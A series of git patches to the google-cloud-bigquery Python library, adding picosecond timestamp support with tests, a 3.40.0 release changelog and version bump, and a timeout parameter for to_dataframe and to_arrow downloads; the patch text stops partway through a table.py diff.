diff --git a/tests/data/pico.csv b/tests/data/pico.csv new file mode 100644 index 000000000..bcc853040 --- /dev/null +++ b/tests/data/pico.csv @@ -0,0 +1,3 @@ +2025-01-01T00:00:00.123456789012Z +2025-01-02T00:00:00.123456789012Z +2025-01-03T00:00:00.123456789012Z \ No newline at end of file diff --git a/tests/data/pico_schema.json b/tests/data/pico_schema.json new file mode 100644 index 000000000..8227917ea --- /dev/null +++ b/tests/data/pico_schema.json @@ -0,0 +1,8 @@ +[ + { + "name": "pico_col", + "type": "TIMESTAMP", + "mode": "NULLABLE", + "timestampPrecision": "12" + } +] diff --git a/tests/system/conftest.py b/tests/system/conftest.py index 8efa042af..123aeb6e7 100644 --- a/tests/system/conftest.py +++ b/tests/system/conftest.py @@ -98,12 +98,14 @@ def load_scalars_table( data_path: str = "scalars.jsonl", source_format=enums.SourceFormat.NEWLINE_DELIMITED_JSON, schema_source="scalars_schema.json", + timestamp_target_precision=None, ) -> str: schema = bigquery_client.schema_from_json(DATA_DIR / schema_source) table_id = data_path.replace(".", "_") + hex(random.randrange(1000000)) job_config = bigquery.LoadJobConfig() job_config.schema = schema job_config.source_format = source_format + job_config.timestamp_target_precision = timestamp_target_precision full_table_id = f"{project_id}.{dataset_id}.{table_id}" with open(DATA_DIR / data_path, "rb") as data_file: job = bigquery_client.load_table_from_file( @@ -169,6 +171,23 @@ def scalars_table_csv( bigquery_client.delete_table(full_table_id, not_found_ok=True) +@pytest.fixture(scope="session") +def scalars_table_pico( + bigquery_client: bigquery.Client, project_id: str, dataset_id: str +): + full_table_id = load_scalars_table( + bigquery_client, + project_id, + dataset_id, + data_path="pico.csv", + source_format=enums.SourceFormat.CSV, + schema_source="pico_schema.json", + timestamp_target_precision=[12], + ) + yield full_table_id + bigquery_client.delete_table(full_table_id, not_found_ok=True) + + @pytest.fixture 
def test_table_name(request, replace_non_anum=re.compile(r"[^a-zA-Z0-9_]").sub): return replace_non_anum("_", request.node.name) diff --git a/tests/system/test_client.py b/tests/system/test_client.py index 3d32a3634..7e773598e 100644 --- a/tests/system/test_client.py +++ b/tests/system/test_client.py @@ -1295,6 +1295,29 @@ def test_load_table_from_json_schema_autodetect_table_exists(self): self.assertEqual(tuple(table.schema), table_schema) self.assertEqual(table.num_rows, 2) + def test_load_table_from_csv_w_picosecond_timestamp(self): + dataset_id = _make_dataset_id("bq_system_test") + self.temp_dataset(dataset_id) + table_id = "{}.{}.load_table_from_json_basic_use".format( + Config.CLIENT.project, dataset_id + ) + + table_schema = Config.CLIENT.schema_from_json(DATA_PATH / "pico_schema.json") + # create the table before loading so that the column order is predictable + table = helpers.retry_403(Config.CLIENT.create_table)( + Table(table_id, schema=table_schema) + ) + self.to_delete.insert(0, table) + + # do not pass an explicit job config to trigger automatic schema detection + with open(DATA_PATH / "pico.csv", "rb") as f: + load_job = Config.CLIENT.load_table_from_file(f, table_id) + load_job.result() + + table = Config.CLIENT.get_table(table) + self.assertEqual(list(table.schema), table_schema) + self.assertEqual(table.num_rows, 3) + def test_load_avro_from_uri_then_dump_table(self): from google.cloud.bigquery.job import CreateDisposition from google.cloud.bigquery.job import SourceFormat diff --git a/tests/system/test_list_rows.py b/tests/system/test_list_rows.py index 108b842ce..02b07744b 100644 --- a/tests/system/test_list_rows.py +++ b/tests/system/test_list_rows.py @@ -132,3 +132,23 @@ def test_list_rows_range(bigquery_client: bigquery.Client, scalars_table_csv: st row_null = rows[1] assert row_null["range_date"] is None + + +def test_list_rows_pico(bigquery_client: bigquery.Client, scalars_table_pico: str): + rows = bigquery_client.list_rows( + 
scalars_table_pico, timestamp_precision=enums.TimestampPrecision.PICOSECOND + ) + rows = list(rows) + row = rows[0] + assert row["pico_col"] == "2025-01-01T00:00:00.123456789012Z" + + +def test_list_rows_pico_truncate( + bigquery_client: bigquery.Client, scalars_table_pico: str +): + # For a picosecond timestamp column, if the user does not explicitly set + # timestamp_precision, will return truncated microsecond precision. + rows = bigquery_client.list_rows(scalars_table_pico) + rows = list(rows) + row = rows[0] + assert row["pico_col"] == "1735689600123456" diff --git a/tests/system/test_query.py b/tests/system/test_query.py index d94a117e3..b8bb06a4c 100644 --- a/tests/system/test_query.py +++ b/tests/system/test_query.py @@ -21,6 +21,7 @@ import pytest from google.cloud import bigquery +from google.cloud.bigquery import enums from google.cloud.bigquery.query import ArrayQueryParameter from google.cloud.bigquery.query import ScalarQueryParameter from google.cloud.bigquery.query import ScalarQueryParameterType @@ -546,3 +547,15 @@ def test_session(bigquery_client: bigquery.Client, query_api_method: str): assert len(rows) == 1 assert rows[0][0] == 5 + + +def test_query_picosecond(bigquery_client: bigquery.Client): + job = bigquery_client.query( + "SELECT CAST('2025-10-20' AS TIMESTAMP(12));", + api_method="QUERY", + timestamp_precision=enums.TimestampPrecision.PICOSECOND, + ) + + result = job.result() + rows = list(result) + assert rows[0][0] == "2025-10-20T00:00:00.000000000000Z" diff --git a/tests/unit/_helpers/test_cell_data_parser.py b/tests/unit/_helpers/test_cell_data_parser.py index 14721a26c..f75e63b48 100644 --- a/tests/unit/_helpers/test_cell_data_parser.py +++ b/tests/unit/_helpers/test_cell_data_parser.py @@ -290,17 +290,26 @@ def test_bytes_to_py_w_base64_encoded_text(object_under_test): def test_timestamp_to_py_w_string_int_value(object_under_test): from google.cloud._helpers import _EPOCH - coerced = object_under_test.timestamp_to_py("1234567", 
object()) + coerced = object_under_test.timestamp_to_py("1234567", create_field()) assert coerced == _EPOCH + datetime.timedelta(seconds=1, microseconds=234567) def test_timestamp_to_py_w_int_value(object_under_test): from google.cloud._helpers import _EPOCH - coerced = object_under_test.timestamp_to_py(1234567, object()) + coerced = object_under_test.timestamp_to_py(1234567, create_field()) assert coerced == _EPOCH + datetime.timedelta(seconds=1, microseconds=234567) +def test_timestamp_to_py_w_picosecond_precision(object_under_test): + from google.cloud.bigquery import enums + + pico_schema = create_field(timestamp_precision=enums.TimestampPrecision.PICOSECOND) + pico_timestamp = "2025-01-01T00:00:00.123456789012Z" + coerced = object_under_test.timestamp_to_py(pico_timestamp, pico_schema) + assert coerced == pico_timestamp + + def test_datetime_to_py_w_string_value(object_under_test): coerced = object_under_test.datetime_to_py("2016-12-02T18:51:33", object()) assert coerced == datetime.datetime(2016, 12, 2, 18, 51, 33) diff --git a/tests/unit/job/test_load_config.py b/tests/unit/job/test_load_config.py index 27d3cead1..2e046bfbf 100644 --- a/tests/unit/job/test_load_config.py +++ b/tests/unit/job/test_load_config.py @@ -1061,9 +1061,40 @@ def test_column_name_character_map_none(self): "parquetOptions": {"enableListInference": True}, "columnNameCharacterMap": "V2", "someNewField": "some-value", + "timestampTargetPrecision": [6, 12], } } + def test_timestamp_target_precision_missing(self): + config = self._get_target_class()() + self.assertIsNone(config.timestamp_target_precision) + + def test_timestamp_target_precision_hit(self): + timestamp_target_precision = [6, 12] + config = self._get_target_class()() + config._properties["load"][ + "timestampTargetPrecision" + ] = timestamp_target_precision + self.assertEqual(config.timestamp_target_precision, timestamp_target_precision) + + def test_timestamp_target_precision_setter(self): + timestamp_target_precision = [6, 
12] + config = self._get_target_class()() + config.timestamp_target_precision = timestamp_target_precision + self.assertEqual( + config._properties["load"]["timestampTargetPrecision"], + timestamp_target_precision, + ) + + def test_timestamp_target_precision_setter_w_none(self): + timestamp_target_precision = [6, 12] + config = self._get_target_class()() + config._properties["load"][ + "timestampTargetPrecision" + ] = timestamp_target_precision + config.timestamp_target_precision = None + self.assertFalse("timestampTargetPrecision" in config._properties["load"]) + def test_from_api_repr(self): from google.cloud.bigquery.job import ( CreateDisposition, @@ -1103,6 +1134,7 @@ def test_from_api_repr(self): self.assertTrue(config.parquet_options.enable_list_inference) self.assertEqual(config.column_name_character_map, ColumnNameCharacterMap.V2) self.assertEqual(config._properties["load"]["someNewField"], "some-value") + self.assertEqual(config.timestamp_target_precision, [6, 12]) def test_to_api_repr(self): from google.cloud.bigquery.job import ( @@ -1140,6 +1172,7 @@ def test_to_api_repr(self): config.parquet_options = parquet_options config.column_name_character_map = ColumnNameCharacterMap.V2 config._properties["load"]["someNewField"] = "some-value" + config.timestamp_target_precision = [6, 12] api_repr = config.to_api_repr() diff --git a/tests/unit/test__job_helpers.py b/tests/unit/test__job_helpers.py index 10cbefe13..19390c7ec 100644 --- a/tests/unit/test__job_helpers.py +++ b/tests/unit/test__job_helpers.py @@ -335,6 +335,7 @@ def test_query_jobs_query_defaults(): assert request["location"] == "asia-northeast1" assert request["formatOptions"]["useInt64Timestamp"] is True assert "timeoutMs" not in request + assert "timestampOutputFormat" not in request["formatOptions"] def test_query_jobs_query_sets_format_options(): @@ -400,6 +401,35 @@ def test_query_jobs_query_sets_timeout(timeout, expected_timeout): assert request["timeoutMs"] == expected_timeout +def 
test_query_jobs_query_picosecond(): + mock_client = mock.create_autospec(Client) + mock_retry = mock.create_autospec(retries.Retry) + mock_job_retry = mock.create_autospec(retries.Retry) + mock_client._call_api.return_value = { + "jobReference": { + "projectId": "test-project", + "jobId": "abc", + "location": "asia-northeast1", + } + } + _job_helpers.query_jobs_query( + mock_client, + "SELECT * FROM test", + None, + "asia-northeast1", + "test-project", + mock_retry, + None, + mock_job_retry, + enums.TimestampPrecision.PICOSECOND, + ) + + _, call_kwargs = mock_client._call_api.call_args + request = call_kwargs["data"] + assert "useInt64Timestamp" not in request["formatOptions"] + assert request["formatOptions"]["timestampOutputFormat"] == "ISO8601_STRING" + + def test_query_and_wait_uses_jobs_insert(): """With unsupported features, call jobs.insert instead of jobs.query.""" client = mock.create_autospec(Client) diff --git a/tests/unit/test_client.py b/tests/unit/test_client.py index 213f382dc..1c4a9badb 100644 --- a/tests/unit/test_client.py +++ b/tests/unit/test_client.py @@ -55,7 +55,7 @@ from google.cloud import bigquery from google.cloud.bigquery.dataset import DatasetReference, Dataset -from google.cloud.bigquery.enums import UpdateMode, DatasetView +from google.cloud.bigquery.enums import UpdateMode, DatasetView, TimestampPrecision from google.cloud.bigquery import exceptions from google.cloud.bigquery import ParquetOptions import google.cloud.bigquery.retry @@ -5214,6 +5214,56 @@ def test_query_w_query_parameters(self): }, ) + def test_query_pico_timestamp(self): + query = "select *;" + response = { + "jobReference": { + "projectId": self.PROJECT, + "location": "EU", + "jobId": "abcd", + }, + } + creds = _make_credentials() + http = object() + client = self._make_one(project=self.PROJECT, credentials=creds, _http=http) + conn = client._connection = make_connection(response) + + client.query( + query, + location="EU", + api_method="QUERY", + 
timestamp_precision=TimestampPrecision.PICOSECOND, + ) + + # Check that query actually starts the job. + expected_resource = { + "query": query, + "useLegacySql": False, + "location": "EU", + "formatOptions": {"timestampOutputFormat": "ISO8601_STRING"}, + "requestId": mock.ANY, + } + conn.api_request.assert_called_once_with( + method="POST", + path=f"/projects/{self.PROJECT}/queries", + data=expected_resource, + timeout=None, + ) + + def test_query_pico_timestamp_insert_error(self): + query = "select *;" + creds = _make_credentials() + http = object() + client = self._make_one(project=self.PROJECT, credentials=creds, _http=http) + + with pytest.raises(ValueError, match="Picosecond Timestamp is only"): + client.query( + query, + location="EU", + api_method="INSERT", + timestamp_precision=TimestampPrecision.PICOSECOND, + ) + def test_query_job_rpc_fail_w_random_error(self): from google.api_core.exceptions import Unknown from google.cloud.bigquery.job import QueryJob @@ -6817,6 +6867,39 @@ def test_list_rows(self): timeout=7.5, ) + def test_list_rows_pico_timestamp(self): + from google.cloud.bigquery.schema import SchemaField + from google.cloud.bigquery.table import Table + + PATH = "projects/%s/datasets/%s/tables/%s/data" % ( + self.PROJECT, + self.DS_ID, + self.TABLE_ID, + ) + creds = _make_credentials() + http = object() + client = self._make_one(project=self.PROJECT, credentials=creds, _http=http) + conn = client._connection = make_connection({}, {}) + pico_col = SchemaField( + "full_name", + "TIMESTAMP", + mode="REQUIRED", + timestamp_precision=TimestampPrecision.PICOSECOND, + ) + table = Table(self.TABLE_REF, schema=[pico_col]) + + iterator = client.list_rows( + table, timestamp_precision=TimestampPrecision.PICOSECOND + ) + next(iterator.pages) + + conn.api_request.assert_called_once_with( + method="GET", + path="/%s" % PATH, + query_params={"formatOptions.timestampOutputFormat": "ISO8601_STRING"}, + timeout=None, + ) + def 
test_list_rows_w_start_index_w_page_size(self): from google.cloud.bigquery.schema import SchemaField from google.cloud.bigquery.table import Table From 40b4cbf5d1948b1a557fbb52dc7d9ff5334590d4 Mon Sep 17 00:00:00 2001 From: Lingqing Gan Date: Wed, 7 Jan 2026 16:44:07 -0800 Subject: [PATCH 194/202] chore: librarian release pull request: 20260108T001607Z (#2355) PR created by the Librarian CLI to initialize a release. Merging this PR will auto trigger a release. Librarian Version: v0.7.0 Language Image: us-central1-docker.pkg.dev/cloud-sdk-librarian-prod/images-prod/python-librarian-generator@sha256:c8612d3fffb3f6a32353b2d1abd16b61e87811866f7ec9d65b59b02eb452a620
google-cloud-bigquery: 3.40.0 ## [3.40.0](https://github.com/googleapis/python-bigquery/compare/v3.39.0...v3.40.0) (2026-01-08) ### Features * support load_table and list_rows with picosecond timestamp (#2351) ([46764a59](https://github.com/googleapis/python-bigquery/commit/46764a59)) * support timestamp_precision in table schema (#2333) ([8d5785ae](https://github.com/googleapis/python-bigquery/commit/8d5785ae))
--- .librarian/state.yaml | 2 +- CHANGELOG.md | 8 ++++++++ google/cloud/bigquery/version.py | 2 +- 3 files changed, 10 insertions(+), 2 deletions(-) diff --git a/.librarian/state.yaml b/.librarian/state.yaml index 8d67105e3..71bcf16ad 100644 --- a/.librarian/state.yaml +++ b/.librarian/state.yaml @@ -1,7 +1,7 @@ image: us-central1-docker.pkg.dev/cloud-sdk-librarian-prod/images-prod/python-librarian-generator@sha256:c8612d3fffb3f6a32353b2d1abd16b61e87811866f7ec9d65b59b02eb452a620 libraries: - id: google-cloud-bigquery - version: 3.39.0 + version: 3.40.0 last_generated_commit: "" apis: [] source_roots: diff --git a/CHANGELOG.md b/CHANGELOG.md index 4cf177cc5..242165933 100644 --- a/CHANGELOG.md +++ b/CHANGELOG.md @@ -4,6 +4,14 @@ [1]: https://pypi.org/project/google-cloud-bigquery/#history +## [3.40.0](https://github.com/googleapis/google-cloud-python/compare/google-cloud-bigquery-v3.39.0...google-cloud-bigquery-v3.40.0) (2026-01-08) + + +### Features + +* support load_table and list_rows with picosecond timestamp (#2351) ([46764a59ca7a21ed14ad2c91eb7f98c302736c22](https://github.com/googleapis/google-cloud-python/commit/46764a59ca7a21ed14ad2c91eb7f98c302736c22)) +* support timestamp_precision in table schema (#2333) ([8d5785aea50b9f9e5b13bd4c91e8a08d6dac7778](https://github.com/googleapis/google-cloud-python/commit/8d5785aea50b9f9e5b13bd4c91e8a08d6dac7778)) + ## [3.39.0](https://github.com/googleapis/google-cloud-python/compare/google-cloud-bigquery-v3.38.0...google-cloud-bigquery-v3.39.0) (2025-12-12) diff --git a/google/cloud/bigquery/version.py b/google/cloud/bigquery/version.py index 1d5e35889..6b0fa0fba 100644 --- a/google/cloud/bigquery/version.py +++ b/google/cloud/bigquery/version.py @@ -12,4 +12,4 @@ # See the License for the specific language governing permissions and # limitations under the License. 
-__version__ = "3.39.0" +__version__ = "3.40.0" From 4f67ba20b49159e81f645ed98e401b9bb1359c1a Mon Sep 17 00:00:00 2001 From: Chalmer Lowe Date: Thu, 8 Jan 2026 18:25:23 -0500 Subject: [PATCH 195/202] =?UTF-8?q?fix:=20add=20timeout=20parameter=20to?= =?UTF-8?q?=20to=5Fdataframe=20and=20to=5Farrow=20met=E2=80=A6=20(#2354)?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit ### Description This PR adds a `timeout` parameter to the `to_dataframe()` and `to_arrow()` methods (and their corresponding `*_iterable`, `*_geodataframe` and `QueryJob` wrappers) in the BigQuery client library. This addresses an issue where these methods could hang indefinitely if the underlying BigQuery Storage API stream blocked (e.g., due to firewall issues or network interruptions) during the download phase. The added `timeout` parameter ensures that the download operation respects the specified time limit and raises a `concurrent.futures.TimeoutError` if it exceeds the duration. ### Changes - Modified `google/cloud/bigquery/_pandas_helpers.py`: - Updated `_download_table_bqstorage` to accept a `timeout` argument. - Implemented a timeout check within the result processing loop. - Updated wrapper functions `download_dataframe_bqstorage` and `download_arrow_bqstorage` to accept and pass the `timeout` parameter. - Modified `google/cloud/bigquery/table.py`: - Updated `RowIterator` methods (`to_arrow_iterable`, `to_arrow`, `to_dataframe_iterable`, `to_dataframe`, `to_geodataframe`) to accept and pass `timeout`. - Updated `_EmptyRowIterator` methods to match the `RowIterator` signature, preventing `TypeError` when a timeout is provided for empty result sets. - Modified `google/cloud/bigquery/job/query.py`: - Updated `QueryJob` methods (`to_arrow`, `to_dataframe`, `to_geodataframe`) to accept `timeout` and pass it to the result iterator. 
- Updated unit tests in `tests/unit/job/test_query_pandas.py`, `tests/unit/test_table.py`, and `tests/unit/test_table_pandas.py` to reflect the signature changes. Fixes internal bug: b/468091307 --- google/cloud/bigquery/_pandas_helpers.py | 126 ++++++++++++++--------- google/cloud/bigquery/job/query.py | 17 +++ google/cloud/bigquery/table.py | 44 +++++++- tests/unit/job/test_query_pandas.py | 33 ++++++ tests/unit/test__pandas_helpers.py | 75 ++++++++++++++ tests/unit/test_table.py | 15 +++ tests/unit/test_table_pandas.py | 2 + 7 files changed, 257 insertions(+), 55 deletions(-) diff --git a/google/cloud/bigquery/_pandas_helpers.py b/google/cloud/bigquery/_pandas_helpers.py index 2dab03a06..5460f7ca7 100644 --- a/google/cloud/bigquery/_pandas_helpers.py +++ b/google/cloud/bigquery/_pandas_helpers.py @@ -26,6 +26,7 @@ import logging import queue import threading +import time import warnings from typing import Any, Union, Optional, Callable, Generator, List @@ -869,6 +870,7 @@ def _download_table_bqstorage( max_queue_size: Any = _MAX_QUEUE_SIZE_DEFAULT, max_stream_count: Optional[int] = None, download_state: Optional[_DownloadState] = None, + timeout: Optional[float] = None, ) -> Generator[Any, None, None]: """Downloads a BigQuery table using the BigQuery Storage API. @@ -899,6 +901,9 @@ def _download_table_bqstorage( download_state (Optional[_DownloadState]): A threadsafe state object which can be used to observe the behavior of the worker threads created by this method. + timeout (Optional[float]): + The number of seconds to wait for the download to complete. + If None, wait indefinitely. Yields: pandas.DataFrame: Pandas DataFrames, one for each chunk of data @@ -906,6 +911,8 @@ def _download_table_bqstorage( Raises: ValueError: If attempting to read from a specific partition or snapshot. + concurrent.futures.TimeoutError: + If the download does not complete within the specified timeout. 
Note: This method requires the `google-cloud-bigquery-storage` library @@ -973,60 +980,73 @@ def _download_table_bqstorage( worker_queue: queue.Queue[int] = queue.Queue(maxsize=max_queue_size) - with concurrent.futures.ThreadPoolExecutor(max_workers=total_streams) as pool: - try: - # Manually submit jobs and wait for download to complete rather - # than using pool.map because pool.map continues running in the - # background even if there is an exception on the main thread. - # See: https://github.com/googleapis/google-cloud-python/pull/7698 - not_done = [ - pool.submit( - _download_table_bqstorage_stream, - download_state, - bqstorage_client, - session, - stream, - worker_queue, - page_to_item, - ) - for stream in session.streams - ] - - while not_done: - # Don't block on the worker threads. For performance reasons, - # we want to block on the queue's get method, instead. This - # prevents the queue from filling up, because the main thread - # has smaller gaps in time between calls to the queue's get - # method. For a detailed explanation, see: - # https://friendliness.dev/2019/06/18/python-nowait/ - done, not_done = _nowait(not_done) - for future in done: - # Call result() on any finished threads to raise any - # exceptions encountered. - future.result() + # Manually manage the pool to control shutdown behavior on timeout. + pool = concurrent.futures.ThreadPoolExecutor(max_workers=max(1, total_streams)) + wait_on_shutdown = True + start_time = time.time() - try: - frame = worker_queue.get(timeout=_PROGRESS_INTERVAL) - yield frame - except queue.Empty: # pragma: NO COVER - continue + try: + # Manually submit jobs and wait for download to complete rather + # than using pool.map because pool.map continues running in the + # background even if there is an exception on the main thread. 
+ # See: https://github.com/googleapis/google-cloud-python/pull/7698 + not_done = [ + pool.submit( + _download_table_bqstorage_stream, + download_state, + bqstorage_client, + session, + stream, + worker_queue, + page_to_item, + ) + for stream in session.streams + ] + + while not_done: + # Check for timeout + if timeout is not None: + elapsed = time.time() - start_time + if elapsed > timeout: + wait_on_shutdown = False + raise concurrent.futures.TimeoutError( + f"Download timed out after {timeout} seconds." + ) + + # Don't block on the worker threads. For performance reasons, + # we want to block on the queue's get method, instead. This + # prevents the queue from filling up, because the main thread + # has smaller gaps in time between calls to the queue's get + # method. For a detailed explanation, see: + # https://friendliness.dev/2019/06/18/python-nowait/ + done, not_done = _nowait(not_done) + for future in done: + # Call result() on any finished threads to raise any + # exceptions encountered. + future.result() + + try: + frame = worker_queue.get(timeout=_PROGRESS_INTERVAL) + yield frame + except queue.Empty: # pragma: NO COVER + continue - # Return any remaining values after the workers finished. - while True: # pragma: NO COVER - try: - frame = worker_queue.get_nowait() - yield frame - except queue.Empty: # pragma: NO COVER - break - finally: - # No need for a lock because reading/replacing a variable is - # defined to be an atomic operation in the Python language - # definition (enforced by the global interpreter lock). - download_state.done = True + # Return any remaining values after the workers finished. + while True: # pragma: NO COVER + try: + frame = worker_queue.get_nowait() + yield frame + except queue.Empty: # pragma: NO COVER + break + finally: + # No need for a lock because reading/replacing a variable is + # defined to be an atomic operation in the Python language + # definition (enforced by the global interpreter lock). 
+ download_state.done = True - # Shutdown all background threads, now that they should know to - # exit early. - pool.shutdown(wait=True) + # Shutdown all background threads, now that they should know to + # exit early. + pool.shutdown(wait=wait_on_shutdown) def download_arrow_bqstorage( @@ -1037,6 +1057,7 @@ def download_arrow_bqstorage( selected_fields=None, max_queue_size=_MAX_QUEUE_SIZE_DEFAULT, max_stream_count=None, + timeout=None, ): return _download_table_bqstorage( project_id, @@ -1047,6 +1068,7 @@ def download_arrow_bqstorage( page_to_item=_bqstorage_page_to_arrow, max_queue_size=max_queue_size, max_stream_count=max_stream_count, + timeout=timeout, ) @@ -1060,6 +1082,7 @@ def download_dataframe_bqstorage( selected_fields=None, max_queue_size=_MAX_QUEUE_SIZE_DEFAULT, max_stream_count=None, + timeout=None, ): page_to_item = functools.partial(_bqstorage_page_to_dataframe, column_names, dtypes) return _download_table_bqstorage( @@ -1071,6 +1094,7 @@ def download_dataframe_bqstorage( page_to_item=page_to_item, max_queue_size=max_queue_size, max_stream_count=max_stream_count, + timeout=timeout, ) diff --git a/google/cloud/bigquery/job/query.py b/google/cloud/bigquery/job/query.py index 38b8a7148..e82deb1ef 100644 --- a/google/cloud/bigquery/job/query.py +++ b/google/cloud/bigquery/job/query.py @@ -1857,6 +1857,7 @@ def to_arrow( bqstorage_client: Optional["bigquery_storage.BigQueryReadClient"] = None, create_bqstorage_client: bool = True, max_results: Optional[int] = None, + timeout: Optional[float] = None, ) -> "pyarrow.Table": """[Beta] Create a class:`pyarrow.Table` by loading all pages of a table or query. @@ -1904,6 +1905,10 @@ def to_arrow( .. versionadded:: 2.21.0 + timeout (Optional[float]): + The number of seconds to wait for the underlying download to complete. + If ``None``, wait indefinitely. 
+ Returns: pyarrow.Table A :class:`pyarrow.Table` populated with row data and column @@ -1921,6 +1926,7 @@ def to_arrow( progress_bar_type=progress_bar_type, bqstorage_client=bqstorage_client, create_bqstorage_client=create_bqstorage_client, + timeout=timeout, ) # If changing the signature of this method, make sure to apply the same @@ -1949,6 +1955,7 @@ def to_dataframe( range_timestamp_dtype: Union[ Any, None ] = DefaultPandasDTypes.RANGE_TIMESTAMP_DTYPE, + timeout: Optional[float] = None, ) -> "pandas.DataFrame": """Return a pandas DataFrame from a QueryJob @@ -2141,6 +2148,10 @@ def to_dataframe( .. versionadded:: 3.21.0 + timeout (Optional[float]): + The number of seconds to wait for the underlying download to complete. + If ``None``, wait indefinitely. + Returns: pandas.DataFrame: A :class:`~pandas.DataFrame` populated with row data @@ -2174,6 +2185,7 @@ def to_dataframe( range_date_dtype=range_date_dtype, range_datetime_dtype=range_datetime_dtype, range_timestamp_dtype=range_timestamp_dtype, + timeout=timeout, ) # If changing the signature of this method, make sure to apply the same @@ -2191,6 +2203,7 @@ def to_geodataframe( int_dtype: Union[Any, None] = DefaultPandasDTypes.INT_DTYPE, float_dtype: Union[Any, None] = None, string_dtype: Union[Any, None] = None, + timeout: Optional[float] = None, ) -> "geopandas.GeoDataFrame": """Return a GeoPandas GeoDataFrame from a QueryJob @@ -2269,6 +2282,9 @@ def to_geodataframe( then the data type will be ``numpy.dtype("object")``. BigQuery String type can be found at: https://cloud.google.com/bigquery/docs/reference/standard-sql/data-types#string_type + timeout (Optional[float]): + The number of seconds to wait for the underlying download to complete. + If ``None``, wait indefinitely. 
Returns: geopandas.GeoDataFrame: @@ -2296,6 +2312,7 @@ def to_geodataframe( int_dtype=int_dtype, float_dtype=float_dtype, string_dtype=string_dtype, + timeout=timeout, ) def __iter__(self): diff --git a/google/cloud/bigquery/table.py b/google/cloud/bigquery/table.py index 5efcb1958..195461006 100644 --- a/google/cloud/bigquery/table.py +++ b/google/cloud/bigquery/table.py @@ -2087,6 +2087,7 @@ def to_arrow_iterable( bqstorage_client: Optional["bigquery_storage.BigQueryReadClient"] = None, max_queue_size: int = _pandas_helpers._MAX_QUEUE_SIZE_DEFAULT, # type: ignore max_stream_count: Optional[int] = None, + timeout: Optional[float] = None, ) -> Iterator["pyarrow.RecordBatch"]: """[Beta] Create an iterable of class:`pyarrow.RecordBatch`, to process the table as a stream. @@ -2127,6 +2128,10 @@ def to_arrow_iterable( setting this parameter value to a value > 0 can help reduce system resource consumption. + timeout (Optional[float]): + The number of seconds to wait for the underlying download to complete. + If ``None``, wait indefinitely. + Returns: pyarrow.RecordBatch: A generator of :class:`~pyarrow.RecordBatch`. @@ -2144,6 +2149,7 @@ def to_arrow_iterable( selected_fields=self._selected_fields, max_queue_size=max_queue_size, max_stream_count=max_stream_count, + timeout=timeout, ) tabledata_list_download = functools.partial( _pandas_helpers.download_arrow_row_iterator, iter(self.pages), self.schema @@ -2161,6 +2167,7 @@ def to_arrow( progress_bar_type: Optional[str] = None, bqstorage_client: Optional["bigquery_storage.BigQueryReadClient"] = None, create_bqstorage_client: bool = True, + timeout: Optional[float] = None, ) -> "pyarrow.Table": """[Beta] Create a class:`pyarrow.Table` by loading all pages of a table or query. @@ -2202,6 +2209,9 @@ def to_arrow( This argument does nothing if ``bqstorage_client`` is supplied. .. versionadded:: 1.24.0 + timeout (Optional[float]): + The number of seconds to wait for the underlying download to complete. 
+ If ``None``, wait indefinitely. Returns: pyarrow.Table @@ -2236,7 +2246,7 @@ def to_arrow( record_batches = [] for record_batch in self.to_arrow_iterable( - bqstorage_client=bqstorage_client + bqstorage_client=bqstorage_client, timeout=timeout ): record_batches.append(record_batch) @@ -2271,6 +2281,7 @@ def to_dataframe_iterable( dtypes: Optional[Dict[str, Any]] = None, max_queue_size: int = _pandas_helpers._MAX_QUEUE_SIZE_DEFAULT, # type: ignore max_stream_count: Optional[int] = None, + timeout: Optional[float] = None, ) -> "pandas.DataFrame": """Create an iterable of pandas DataFrames, to process the table as a stream. @@ -2317,6 +2328,10 @@ def to_dataframe_iterable( setting this parameter value to a value > 0 can help reduce system resource consumption. + timeout (Optional[float]): + The number of seconds to wait for the underlying download to complete. + If ``None``, wait indefinitely. + Returns: pandas.DataFrame: A generator of :class:`~pandas.DataFrame`. @@ -2344,6 +2359,7 @@ def to_dataframe_iterable( selected_fields=self._selected_fields, max_queue_size=max_queue_size, max_stream_count=max_stream_count, + timeout=timeout, ) tabledata_list_download = functools.partial( _pandas_helpers.download_dataframe_row_iterator, @@ -2381,6 +2397,7 @@ def to_dataframe( range_timestamp_dtype: Union[ Any, None ] = DefaultPandasDTypes.RANGE_TIMESTAMP_DTYPE, + timeout: Optional[float] = None, ) -> "pandas.DataFrame": """Create a pandas DataFrame by loading all pages of a query. @@ -2577,6 +2594,10 @@ def to_dataframe( .. versionadded:: 3.21.0 + timeout (Optional[float]): + The number of seconds to wait for the underlying download to complete. + If ``None``, wait indefinitely. 
+ Returns: pandas.DataFrame: A :class:`~pandas.DataFrame` populated with row data and column @@ -2690,6 +2711,7 @@ def to_dataframe( progress_bar_type=progress_bar_type, bqstorage_client=bqstorage_client, create_bqstorage_client=create_bqstorage_client, + timeout=timeout, ) # Default date dtype is `db_dtypes.DateDtype()` that could cause out of bounds error, @@ -2768,6 +2790,7 @@ def to_geodataframe( int_dtype: Union[Any, None] = DefaultPandasDTypes.INT_DTYPE, float_dtype: Union[Any, None] = None, string_dtype: Union[Any, None] = None, + timeout: Optional[float] = None, ) -> "geopandas.GeoDataFrame": """Create a GeoPandas GeoDataFrame by loading all pages of a query. @@ -2902,6 +2925,7 @@ def to_geodataframe( int_dtype=int_dtype, float_dtype=float_dtype, string_dtype=string_dtype, + timeout=timeout, ) return geopandas.GeoDataFrame( @@ -2917,9 +2941,6 @@ class _EmptyRowIterator(RowIterator): statements. """ - pages = () - total_rows = 0 - def __init__( self, client=None, api_request=None, path=None, schema=(), *args, **kwargs ): @@ -2931,12 +2952,14 @@ def __init__( *args, **kwargs, ) + self._total_rows = 0 def to_arrow( self, progress_bar_type=None, bqstorage_client=None, create_bqstorage_client=True, + timeout: Optional[float] = None, ) -> "pyarrow.Table": """[Beta] Create an empty class:`pyarrow.Table`. @@ -2944,6 +2967,7 @@ def to_arrow( progress_bar_type (str): Ignored. Added for compatibility with RowIterator. bqstorage_client (Any): Ignored. Added for compatibility with RowIterator. create_bqstorage_client (bool): Ignored. Added for compatibility with RowIterator. + timeout (Optional[float]): Ignored. Added for compatibility with RowIterator. Returns: pyarrow.Table: An empty :class:`pyarrow.Table`. @@ -2970,6 +2994,7 @@ def to_dataframe( range_date_dtype=None, range_datetime_dtype=None, range_timestamp_dtype=None, + timeout: Optional[float] = None, ) -> "pandas.DataFrame": """Create an empty dataframe. 
